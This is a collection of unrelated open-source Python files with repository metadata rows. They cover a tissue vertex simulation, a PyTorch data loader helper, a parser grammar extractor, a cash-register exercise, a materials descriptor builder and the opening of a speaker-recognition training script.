force_dict[pts[i]] = np.add(force_dict[pts[i]],force)
# pressure for:
# basal nodes
area, extra = be_area([center+1000,pts[i-1]+1000,pts[i]+1000],[center+1000,pts[i-1]+1000,pts[i]+1000],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center+1000] = np.add(force_dict[center+1000],force)
force_dict[pts[i-1]+1000] = np.add(force_dict[pts[i-1]+1000],force)
force_dict[pts[i]+1000] = np.add(force_dict[pts[i]+1000],force)
# pressure for side panels
# loop through each cell
for index in range(0,len(circum_sorted)):
cell_nodes = circum_sorted[index]
centroid = np.array([pos[centers[index]], pos[centers[index]+1000]])
centroid = np.average(centroid, axis=0)
# loop through the 6 faces (or 5 or 7 after intercalation)
for i in range(0, len(cell_nodes)):
pts_id = np.array([cell_nodes[i-1], cell_nodes[i], cell_nodes[i]+1000, cell_nodes[i-1]+1000])
pts_pos = np.array([pos[pts_id[ii]] for ii in range(0,4)])
# on each face, calculate the center
center = np.average(pts_pos,axis=0)
# loop through the 4 triangles that make the face
for ii in range(0,4):
pos_side = [center, pts_pos[ii-1], pts_pos[ii]]
area = area_side(pos_side)
magnitude = PI[index]*area[0]*(1/2)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[pts_id[ii-1]] = np.add(force_dict[pts_id[ii-1]],force)
force_dict[pts_id[ii]] = np.add(force_dict[pts_id[ii]],force)
# Implement bending energy
# Loop through all alpha, beta pairs of triangles
for pair in triangles:
alpha, beta = pair[0], pair[1]
# Apical faces, calculate areas and cross-products
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# Basal faces
alpha = [alpha[0]+1000, alpha[1]+1000, alpha[2]+1000]
beta = [beta[0]+1000, beta[1]+1000, beta[2]+1000]
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# update location of node
pos = nx.get_node_attributes(G,'pos')
for node in force_dict:
G.node[node]['pos'] = d_pos(pos[node],force_dict[node],dt)
## Check for intercalation events
pos = nx.get_node_attributes(G,'pos')
for node in range(0,num_api_nodes):
if node not in belt:
for neighbor in G.neighbors(node):
if (neighbor < 1000) and (neighbor not in belt) and (node not in centers) and (neighbor not in centers) and ([min(node, neighbor), max(node, neighbor)] not in blacklist):
a = pos[node]
b = pos[neighbor]
c = pos[node+1000]
d = pos[neighbor+1000]
dist = distance.euclidean(a,b)
if (dist < const.l_intercalation):
if (np.random.rand(1)[0] < 1.):
print("Intercalation event between nodes", node, "and", neighbor, "at t = ", t)
# collapse nodes to same position
# apical
avg_loc = (np.array(a) + np.array(b)) / 2.0
a = avg_loc
b = avg_loc
# basal
avg_loc = (np.array(c) + np.array(d)) / 2.0
c = avg_loc
d = avg_loc
# move nodes toward new center
# apical
cents = list(set(G.neighbors(node)) & set(G.neighbors(neighbor)))
mvmt = unit_vector(a,pos[cents[1]])
a = [a[0]+l_mvmt*mvmt[0], a[1]+l_mvmt*mvmt[1], a[2]+l_mvmt*mvmt[2]]
G.node[node]['pos'] = a
mvmt = unit_vector(b,pos[cents[0]])
b = [b[0]+l_mvmt*mvmt[0], b[1]+l_mvmt*mvmt[1], b[2]+l_mvmt*mvmt[2]]
G.node[neighbor]['pos'] = b
# basal
#cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000)))
mvmt = unit_vector(c,pos[cents[1]+1000])
c = [c[0]+l_mvmt*mvmt[0], c[1]+l_mvmt*mvmt[1], c[2]+l_mvmt*mvmt[2]]
G.node[node+1000]['pos'] = c
mvmt = unit_vector(d,pos[cents[0]+1000])
d = [d[0]+l_mvmt*mvmt[0], d[1]+l_mvmt*mvmt[1], d[2]+l_mvmt*mvmt[2]]
G.node[neighbor+1000]['pos'] = d
ii = list((set(list(G.neighbors(node))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
jj = list((set(list(G.neighbors(neighbor))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
temp1 = list(set(G.neighbors(node)) & set(G.neighbors(cents[0])))
temp1.remove(neighbor)
temp2 = list(set(G.neighbors(neighbor)) & set(G.neighbors(cents[1])))
temp2.remove(node)
# sever connections
# apical
G.remove_edge(node,cents[0])
G.remove_edge(node,temp1[0])
G.remove_edge(neighbor,cents[1])
G.remove_edge(neighbor,temp2[0])
# basal
G.remove_edge(node+1000,cents[0]+1000)
G.remove_edge(node+1000,temp1[0]+1000)
G.remove_edge(neighbor+1000,cents[1]+1000)
G.remove_edge(neighbor+1000,temp2[0]+1000)
# add new connections
# apical
# new edges
G.add_edge(node,temp2[0],l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor,temp1[0],l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor,ii,l_rest = const.l_apical, myosin=0)
G.add_edge(node,jj,l_rest = const.l_apical, myosin=0)
# basal
# new edges
G.add_edge(node+1000,temp2[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor+1000,temp1[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor+1000,ii+1000,l_rest = const.l_apical, myosin=0)
G.add_edge(node+1000,jj+1000,l_rest = const.l_apical, myosin=0)
# reset myosin on contracted edge
G[node][neighbor]['myosin'] = 0
G[node+1000][neighbor+1000]['myosin'] = 0
blacklist.append([min(node, neighbor), max(node, neighbor)])
circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
if min(node,neighbor) == 301:
contract[0] = False
# #set dt for next loop
# if var_dt == True:
# if any(contract) == True:
# # if any edges are still contracting, check for threshold length
# for i in range(0,num_inter):
# # calculate lengths of those that are still True
# if contract[i] == True:
# a = inter_edges[i][0]
# b = inter_edges[i][1]
# if distance.euclidean(pos[a],pos[b]) < 0.2:
# dt = 0.1
# break
# else:
# if isclose(t % 1, 0) == False:
# dt = 0.1
# else:
# dt = const.dt
# var_dt = False
# else:
# dt = const.dt
# Save nx Graph in pickled form for plotting later
if t % 1 == 0:
file_name = 't' + str(round(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
| 43.444162 | 213 | 0.526903 | [
"MIT"
] | laurentmackay/3d-vertex | main_orig.py | 17,117 | Python |
from typing import Callable, Iterable
import torch
from torch.utils.data.dataloader import default_collate as default_collate_fn
from catalyst.data import ListDataset
def get_loader(
data_source: Iterable[dict],
open_fn: Callable,
dict_transform: Callable = None,
sampler=None,
collate_fn: Callable = default_collate_fn,
batch_size: int = 32,
num_workers: int = 4,
shuffle: bool = False,
drop_last: bool = False,
):
"""Creates a DataLoader from given source and its open/transform params.
Args:
data_source (Iterable[dict]): and iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset``
"""
dataset = ListDataset(
list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,
)
loader = torch.utils.data.DataLoader(
dataset=dataset,
sampler=sampler,
collate_fn=collate_fn,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=torch.cuda.is_available(),
drop_last=drop_last,
)
return loader
__all__ = ["get_loader"]
| 36.956522 | 78 | 0.652941 | [
"Apache-2.0"
] | Inkln/catalyst | catalyst/dl/utils/torch.py | 2,550 | Python |
"""
This module contains functionality for extracting a grammar from
classes in a module.
"""
from __future__ import annotations
import types
from parsing.interfaces import SpecSource
from parsing.grammar import (
PrecedenceSpec,
PrecedenceRef,
TokenSpec,
NontermSpec,
)
from parsing.ast import Token, Nonterm, Precedence
from parsing import introspection
from parsing.errors import SpecError
class ModuleSpecSource(SpecSource):
"""
ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
"""
def __init__(
self, modules: types.ModuleType | list[types.ModuleType]
) -> None:
if isinstance(modules, types.ModuleType):
# Wrap single module in a list.
modules = [modules]
self.modules = modules
items = []
for module in self.modules:
for k, v in module.__dict__.items():
if isinstance(v, type) and isinstance(v.__doc__, str):
dirtoks = introspection.parse_docstring(v.__doc__)
items.append((module, k, v, dirtoks))
self.named_objs = items
self._cache_precedences: list[PrecedenceSpec] | None = None
self._cache_tokens: list[TokenSpec] | None = None
self._cache_nonterminals: tuple[
list[NontermSpec], NontermSpec
] | None = None
def get_precedences(self) -> list[PrecedenceSpec]:
if self._cache_precedences is not None:
return self._cache_precedences
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Precedence) and dirtoks[0] in [
"%fail",
"%nonassoc",
"%left",
"%right",
"%split",
]:
name = k
relationships = {}
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = PrecedenceSpec.assoc_tok_re.match(tok)
if m:
# Precedence relationship.
if m.group(2) in relationships:
raise SpecError(
"Duplicate precedence "
"relationship: %s" % v.__doc__
)
relationships[m.group(2)] = m.group(1)
else:
m = NontermSpec.token_re.match(tok)
if m:
if i != 1:
raise SpecError(
"Precedence name must come before "
"relationships: %s" % v.__doc__
)
name = m.group(1)
else:
raise SpecError(
"Invalid precedence specification: %s"
% v.__doc__
)
i += 1
prec = PrecedenceSpec(name, dirtoks[0][1:], relationships)
result.append(prec)
self._cache_precedences = result
return result
def get_tokens(self) -> list[TokenSpec]:
if self._cache_tokens is not None:
return self._cache_tokens
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Token) and dirtoks[0] in ["%token"]:
name = k
prec = None
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = NontermSpec.precedence_tok_re.match(tok)
if m:
if i < len(dirtoks) - 1:
raise SpecError(
"Precedence must come last in token "
"specification: %s" % v.__doc__
)
prec = PrecedenceRef(m.group(1))
else:
m = NontermSpec.token_re.match(tok)
if m:
name = m.group(1)
else:
raise SpecError(
"Invalid token specification: %s" % v.__doc__
)
i += 1
if prec is None:
prec = PrecedenceRef("none")
token = TokenSpec(v, name, prec)
result.append(token)
self._cache_tokens = result
return result
def get_nonterminals(self) -> tuple[list[NontermSpec], NontermSpec]:
if self._cache_nonterminals is not None:
return self._cache_nonterminals
result = []
startSym: NontermSpec | None = None
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Nonterm) and dirtoks[0] in ["%start", "%nonterm"]:
nonterm, is_start = NontermSpec.from_class(v)
result.append(nonterm)
if is_start:
# Start symbol.
if startSym is not None:
raise SpecError(
"Only one start non-terminal allowed: %s"
% v.__doc__
)
startSym = nonterm
assert startSym is not None
self._cache_nonterminals = (result, startSym)
return result, startSym
| 37.973154 | 79 | 0.470308 | [
"MIT"
] | MagicStack/parsing | parsing/module_spec.py | 5,658 | Python |
# cash register
class RetailItem:
def __init__(self, description, units_in_inventory, price):
self.__description = description
self.__units_in_inventory = units_in_inventory
self.__price = price
def get_description(self):
return self.__description
def get_units_in_inventory(self):
return self.__units_in_inventory
def get_price(self):
return self.__price
def set_description(self, description):
self.__description = description
def set_units_in_inventory(self, units_in_inventory):
self.__units_in_inventory = units_in_inventory
def set_price(self, price):
self.__price = price
def __str__(self):
return self.__description + ", " + \
"items: " + str(self.__units_in_inventory) + ", " + \
"$ " + str(float(self.__price)) + ". "
class CashRegister:
all_items_in_cart = []
def purchase_item(self, retail_item):
return self.all_items_in_cart.append(retail_item)
def get_total(self):
total = 0
for item in self.all_items_in_cart:
total += RetailItem.get_price(item) * \
RetailItem.get_units_in_inventory(item)
return total
def get_num_items(self):
num_items = 0
for item in self.all_items_in_cart:
num_items += RetailItem.get_units_in_inventory(item)
return num_items
def show_items(self):
if not self.all_items_in_cart:
print("Your Cart is empty.")
print("Your Cart:")
for item in self.all_items_in_cart:
print(item)
def clear(self):
self.all_items_in_cart.clear()
def main():
more = "y"
while more == "y":
# if you want to manually enter object parameters manually
# enter the instance attribute values
print("If you want to manually enter object parameters\n"
"manually enter the instance attribute values.")
print("Enter yours item.")
more_item = "y"
while more_item == "y":
description = input("description: ")
units_in_inventory = int(input("count of item: "))
price = float(input("price: "))
items = RetailItem(description, units_in_inventory, price)
CashRegister().purchase_item(items)
more_item = input("More item yes -'y', no -'any ch'.")
if more_item == "y":
continue
ready = input("Ready to pay? yes 'y', no 'any ch'")
if ready == "y":
print()
# show all item in basket
CashRegister().show_items()
# Showing the customer the number of selected products
print("Numbers of items:", CashRegister().get_num_items())
# returns the total cost of all RetailItem objects
# stored in the object's internal list 'all_items_in_cart'
print("Total = $",
'{:.2f}'.format(CashRegister().get_total()))
print()
print("Enter 'y' if you pay, no 'any ch'.")
print("Enter 'c' if you want clean cart.")
pay = input("Enter: ")
if pay == "y":
print("Paid.")
print("Product sent.")
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("Shopping cart empty.", CashRegister().clear())
break
if pay == "c":
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("we clear the shopping cart",
CashRegister().clear())
else:
print("The product remained in cart.")
more = input("Add more products? yes 'y', no 'any ch'")
main()
| 33.752 | 79 | 0.560796 | [
"MIT"
] | SergeHall/Tony-Gaddis-Python-4th | chapter_10/08_cash_register.py | 4,219 | Python |
from itertools import chain
from typing import Iterator, Mapping, Union, List
from uuid import UUID
from gemd.entity.link_by_uid import LinkByUID
from gemd.entity.bounds import RealBounds, CategoricalBounds, MolecularStructureBounds, \
IntegerBounds, CompositionBounds
from gemd.entity.template.attribute_template import AttributeTemplate
from gemd.entity.template.has_property_templates import HasPropertyTemplates
from gemd.entity.template.has_condition_templates import HasConditionTemplates
from gemd.entity.template.has_parameter_templates import HasParameterTemplates
from gemd.entity.value import EmpiricalFormula
from gemd.util import recursive_flatmap, set_uuids
from citrine.builders.auto_configure import AutoConfigureMode
from citrine.informatics.descriptors import RealDescriptor, CategoricalDescriptor, \
MolecularStructureDescriptor, Descriptor, ChemicalFormulaDescriptor
from citrine.resources.data_concepts import DataConceptsCollection
from citrine.resources.material_run import MaterialRun
from citrine.resources.project import Project
class NoEquivalentDescriptorError(ValueError):
"""Error that is raised when the bounds in a template have no equivalent descriptor."""
pass
def template_to_descriptor(template: AttributeTemplate, *,
headers: List[str] = []) -> Descriptor:
"""
Convert a GEMD attribute template into an AI Engine Descriptor.
IntBounds cannot be converted because they have no matching descriptor type.
CompositionBounds can only be converted when every component is an element, in which case
they are converted to ChemicalFormulaDescriptors.
Parameters
----------
template: AttributeTemplate
Template to convert into a descriptor
headers: List[str]
Names of parent relationships to includes as prefixes
to the template name in the descriptor key
Default: []
Returns
-------
Descriptor
Descriptor with a key matching the template name and type corresponding to the bounds
"""
headers = headers + [template.name]
descriptor_key = '~'.join(headers)
bounds = template.bounds
if isinstance(bounds, RealBounds):
return RealDescriptor(
key=descriptor_key,
lower_bound=bounds.lower_bound,
upper_bound=bounds.upper_bound,
units=bounds.default_units
)
if isinstance(bounds, CategoricalBounds):
return CategoricalDescriptor(
key=descriptor_key,
categories=bounds.categories
)
if isinstance(bounds, MolecularStructureBounds):
return MolecularStructureDescriptor(
key=descriptor_key
)
if isinstance(bounds, CompositionBounds):
if set(bounds.components).issubset(EmpiricalFormula.all_elements()):
return ChemicalFormulaDescriptor(
key=descriptor_key
)
else:
msg = "Cannot create descriptor for CompositionBounds with non-atomic components"
raise NoEquivalentDescriptorError(msg)
if isinstance(bounds, IntegerBounds):
raise NoEquivalentDescriptorError("Cannot create a descriptor for integer-valued data")
raise ValueError("Template has unrecognized bounds: {}".format(type(bounds)))
class PlatformVocabulary(Mapping[str, Descriptor]):
"""
Dictionary of descriptors that define a controlled vocabulary for the AI Engine.
Parameters
----------
entries: Mapping[str, Descriptor]
Entries in the dictionary, indexed by a convenient name.
To build from templates, use PlatformVocabulary.from_templates
To build from a material, use PlatformVocabulary.from_material
"""
def __init__(self, *, entries: Mapping[str, Descriptor]):
self._entries = entries
def __getitem__(self, k: str) -> Descriptor:
return self._entries[k]
def __len__(self):
return len(self._entries)
def __iter__(self) -> Iterator[str]:
return iter(self._entries)
@staticmethod
def from_templates(*, project: Project, scope: str):
"""
Build a PlatformVocabulary from the templates visible to a project.
All of the templates with the given scope are downloaded and converted into descriptors.
The uid values associated with that scope are used as the index into the dictionary.
For example, using scope "my_templates" with a template with
uids={"my_templates": "density"} would be indexed into the dictionary as "density".
Parameters
----------
project: Project
Project on the Citrine Platform to read templates from
scope: str
Unique ID scope from which to pull the template names
Returns
-------
PlatformVocabulary
"""
def _from_collection(collection: DataConceptsCollection):
return {x.uids[scope]: x for x in collection.list() if scope in x.uids}
properties = _from_collection(project.property_templates)
parameters = _from_collection(project.parameter_templates)
conditions = _from_collection(project.condition_templates)
res = {}
for k, v in chain(properties.items(), parameters.items(), conditions.items()):
try:
desc = template_to_descriptor(v)
res[k] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
@staticmethod
def from_material(
*,
project: Project,
material: Union[str, UUID, LinkByUID, MaterialRun],
mode: AutoConfigureMode = AutoConfigureMode.PLAIN,
full_history: bool = True
):
"""[ALPHA] Build a PlatformVocabulary from templates appearing in a material history.
All of the attribute templates that appear throughout the material's history
are extracted and converted into descriptors.
Descriptor keys are formatted according to the option set by mode.
For example, if a condition template with name 'Condition 1'
appears in a parent process with name 'Parent',
the mode option produces the following descriptor key:
mode = AutoConfigMode.PLAIN --> 'Parent~Condition 1'
mode = AutoConfigMode.FORMULATION --> 'Condition 1'
Parameters
----------
project: Project
Project to use when accessing the Citrine Platform.
material: Union[str, UUID, LinkByUID, MaterialRun]
A representation of the material to extract descriptors from.
mode: AutoConfigureMode
Formatting option for descriptor keys in the platform vocabulary.
Option AutoConfigMode.PLAIN includes headers from the parent object,
whereas option AutoConfigMode.FORMULATION does not.
Default: AutoConfigureMode.PLAIN
full_history: bool
Whether to extract descriptors from the full material history,
or only the provided (terminal) material.
Default: True
Returns
-------
PlatformVocabulary
"""
if not isinstance(mode, AutoConfigureMode):
raise TypeError('mode must be an option from AutoConfigureMode')
# Full history not needed when full_history = False
# But is convenient to populate templates for terminal material
history = project.material_runs.get_history(id=material)
if full_history:
search_history = recursive_flatmap(history, lambda x: [x], unidirectional=False)
set_uuids(search_history, 'id')
else:
# Limit the search to contain the terminal material/process/measurements
search_history = [history.spec.template, history.process.template]
search_history.extend([msr.template for msr in history.measurements])
search_history = [x for x in search_history if x is not None] # Edge case safety
# Extract templates and formatted keys
res = {}
for obj in search_history:
# Extract all templates
templates = []
if isinstance(obj, HasPropertyTemplates):
for property in obj.properties:
templates.append(property[0])
if isinstance(obj, HasConditionTemplates):
for condition in obj.conditions:
templates.append(condition[0])
if isinstance(obj, HasParameterTemplates):
for parameter in obj.parameters:
templates.append(parameter[0])
# Assemble to descriptors
headers = []
if mode == AutoConfigureMode.PLAIN:
headers.append(obj.name)
for tmpl in templates:
try:
desc = template_to_descriptor(tmpl, headers=headers)
res[desc.key] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
| 39.111111 | 96 | 0.668706 | [
"Apache-2.0"
] | CitrineInformatics/citrine-python | src/citrine/builders/descriptors.py | 9,152 | Python |
#!/usr/bin/env python
# encoding: utf-8
"""
@Author: yangwenhao
@Contact: [email protected]
@Software: PyCharm
@File: train_lores10_kaldi.py
@Time: 2020/4/4 11:14 AM
@Overview:
"""
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import time
# Version conflict
import warnings
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchvision.transforms as transforms
from kaldi_io import read_mat, read_vec_flt
from tensorboardX import SummaryWriter
from torch.autograd import Variable
from torch.optim.lr_scheduler import MultiStepLR, ExponentialLR
from tqdm import tqdm
from Define_Model.LossFunction import CenterLoss
from Define_Model.SoftmaxLoss import AngleSoftmaxLoss, AngleLinear, AdditiveMarginLinear, AMSoftmaxLoss
from Define_Model.model import PairwiseDistance
from Process_Data import constants as c
from Process_Data.KaldiDataset import ScriptTestDataset, KaldiExtractDataset, \
ScriptVerifyDataset
from Process_Data.LmdbDataset import EgsDataset
from Process_Data.audio_processing import concateinputfromMFB, to2tensor, varLengthFeat, ConcateVarInput
from Process_Data.audio_processing import toMFB, totensor, truncatedinput, read_audio
from TrainAndTest.common_func import create_optimizer, create_model, verification_test, verification_extract
from eval_metrics import evaluate_kaldi_eer, evaluate_kaldi_mindcf
from logger import NewLogger
warnings.filterwarnings("ignore")
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')
# Data options
parser.add_argument('--train-dir', type=str, help='path to dataset')
parser.add_argument('--valid-dir', type=str, help='path to dataset')
parser.add_argument('--test-dir', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--trials', type=str, default='trials', help='trials filename')
parser.add_argument('--domain', action='store_true', default=False, help='set domain in dataset')
parser.add_argument('--nj', default=12, type=int, metavar='NJOB', help='num of job')
parser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],
help='number of jobs to make feats (default: 10)')
parser.add_argument('--check-path', default='Data/checkpoint/LoResNet10/spect/soft',
help='folder to output model checkpoints')
parser.add_argument('--save-init', action='store_true', default=True, help='need to make mfb file')
parser.add_argument('--resume',
default='Data/checkpoint/LoResNet10/spect/soft/checkpoint_10.pth', type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--start-epoch', default=1, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--epochs', type=int, default=20, metavar='E',
help='number of epochs to train (default: 10)')
parser.add_argument('--scheduler', default='multi', type=str,
metavar='SCH', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--gamma', default=0.75, type=float,
metavar='GAMMA', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--milestones', default='10,15', type=str,
metavar='MIL', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',
help='minimum epoch for initial parameter using softmax (default: 2')
parser.add_argument('--veri-pairs', type=int, default=12800, metavar='VP',
help='number of epochs to train (default: 10)')
# Training options
# Model options
parser.add_argument('--model', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--resnet-size', default=8, type=int,
metavar='RES', help='The channels of convs layers)')
parser.add_argument('--inst-norm', action='store_true', default=False,
help='replace batchnorm with instance norm')
parser.add_argument('--channels', default='64,128,256', type=str,
metavar='CHA', help='The channels of convs layers)')
parser.add_argument('--feat-dim', default=161, type=int, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--remove-vad', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--alpha', default=12, type=float, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE',
help='kernel size of conv filters')
parser.add_argument('--cos-sim', action='store_true', default=True,
help='using Cosine similarity')
parser.add_argument('--avg-size', type=int, default=4, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-a', type=int, default=128, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-b', type=int, default=64, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-o', type=int, default=32, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
parser.add_argument('--input-per-spks', type=int, default=224, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-batch-size', type=int, default=1, metavar='BST',
help='input batch size for testing (default: 64)')
parser.add_argument('--dropout-p', type=float, default=0., metavar='BST',
help='input batch size for testing (default: 64)')
# loss configure
parser.add_argument('--loss-type', type=str, default='soft', choices=['soft', 'asoft', 'center', 'amsoft'],
help='path to voxceleb1 test dataset')
parser.add_argument('--finetune', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
parser.add_argument('--dom-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
parser.add_argument('--sim-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
# args for additive margin-softmax
parser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',
help='the margin value for the angualr softmax loss function (default: 3.0')
parser.add_argument('--s', type=float, default=15, metavar='S',
help='the margin value for the angualr softmax loss function (default: 3.0')
# args for a-softmax
parser.add_argument('--m', type=int, default=3, metavar='M',
help='the margin value for the angualr softmax loss function (default: 3.0')
parser.add_argument('--lambda-min', type=int, default=5, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--lambda-max', type=float, default=1000, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.125)')
parser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',
help='learning rate decay ratio (default: 1e-4')
parser.add_argument('--weight-decay', default=5e-4, type=float,
metavar='WEI', help='weight decay (default: 0.0)')
parser.add_argument('--momentum', default=0.9, type=float,
metavar='MOM', help='momentum for sgd (default: 0.9)')
parser.add_argument('--dampening', default=0, type=float,
metavar='DAM', help='dampening for sgd (default: 0.0)')
parser.add_argument('--optimizer', default='sgd', type=str,
metavar='OPT', help='The optimizer to use (default: Adagrad)')
# Device options
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--gpu-id', default='1', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--seed', type=int, default=123456, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--log-interval', type=int, default=1, metavar='LI',
help='how many batches to wait before logging training status')
parser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',
help='choose the acoustic features type.')
parser.add_argument('--makemfb', action='store_true', default=False,
help='need to make mfb file')
parser.add_argument('--makespec', action='store_true', default=False,
help='need to make spectrograms file')
args = parser.parse_args()
# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in
# order to prevent any memory allocation on unused GPUs
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
args.cuda = not args.no_cuda and torch.cuda.is_available()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# torch.multiprocessing.set_sharing_strategy('file_system')
if args.cuda:
torch.cuda.manual_seed_all(args.seed)
cudnn.benchmark = True
# create logger Define visulaize SummaryWriter instance
writer = SummaryWriter(logdir=args.check_path, filename_suffix='_first')
sys.stdout = NewLogger(osp.join(args.check_path, 'log.txt'))
kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}
if not os.path.exists(args.check_path):
os.makedirs(args.check_path)
opt_kwargs = {'lr': args.lr,
'lr_decay': args.lr_decay,
'weight_decay': args.weight_decay,
'dampening': args.dampening,
